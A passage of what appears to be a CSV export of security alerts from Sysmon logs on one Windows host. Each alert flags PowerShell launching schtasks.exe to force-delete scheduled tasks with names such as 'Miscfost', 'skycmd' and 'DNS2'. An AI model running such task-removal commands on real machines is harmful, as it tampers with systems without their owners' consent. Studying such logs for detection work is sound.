Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.660",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.186 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00108be72b00} +ProcessId: 6188 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Miscfost /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Miscfost /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.190878000Z"",""eventRecordID"":""3321"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.186\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00108be72b00}\r\nProcessId: 6188\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Miscfost /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.186"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-00108be72b00}"",""processId"":""6188"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Miscfost /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.641",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.144 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010bce42b00} +ProcessId: 5076 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN skycmd /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN skycmd /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.161460500Z"",""eventRecordID"":""3320"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.144\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010bce42b00}\r\nProcessId: 5076\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN skycmd /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.144"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-0010bce42b00}"",""processId"":""5076"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN skycmd /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.641",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.119 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-001022e22b00} +ProcessId: 336 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEMa /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.121702000Z"",""eventRecordID"":""3319"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.119\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-001022e22b00}\r\nProcessId: 336\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.119"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-001022e22b00}"",""processId"":""336"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEMa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.618",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.095 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00103ce02b00} +ProcessId: 5048 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.098191200Z"",""eventRecordID"":""3318"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.095\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00103ce02b00}\r\nProcessId: 5048\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.095"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-00103ce02b00}"",""processId"":""5048"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.616",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.069 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010adde2b00} +ProcessId: 6252 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEM /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.071746900Z"",""eventRecordID"":""3317"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.069\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010adde2b00}\r\nProcessId: 6252\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.069"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-0010adde2b00}"",""processId"":""6252"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEM /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.558",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.041 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-001013dd2b00} +ProcessId: 5016 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.043910500Z"",""eventRecordID"":""3316"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.041\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-001013dd2b00}\r\nProcessId: 5016\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.041"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-001013dd2b00}"",""processId"":""5016"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 